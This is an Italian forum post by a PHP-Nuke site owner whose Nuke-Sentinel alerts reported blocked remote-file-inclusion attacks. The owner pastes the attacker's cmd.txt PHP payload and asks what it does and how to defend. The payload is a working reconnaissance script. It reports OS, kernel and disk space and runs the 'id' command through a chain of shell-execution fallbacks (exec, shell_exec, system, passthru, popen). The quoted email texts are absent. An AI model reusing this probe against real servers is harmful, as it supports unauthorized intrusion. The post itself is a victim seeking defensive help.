ciao a tutti!
mi sono arrivate due email di nuke-sentinel che mi avvisano di presunti attacchi bloccati!
ecco il testo dell'ultima email:
Ora il link di questo s...zo porta al file cmd.txt di un dominio che ad ogni attacco cambia cosi' come l'ip, che mi fa pensare usi un proxy.
il testo della prima email:
il testo del file cmd.txt e' questo:
Codice PHP:
<?php
echo "Mic22";
$dir = @getcwd();
$ker = @php_uname();
$OS = @PHP_OS;
echo "
OSTYPE:$OS
";
echo "
Kernel:$ker
";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."
";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}
exit;
dal codice chiama alcune funzioni che non capisco dato che non conosco php-nuke.
e' possibile rintracciare l'autore di queste malefatte?
cosa fa lo script?
come posso difendermi?
grazie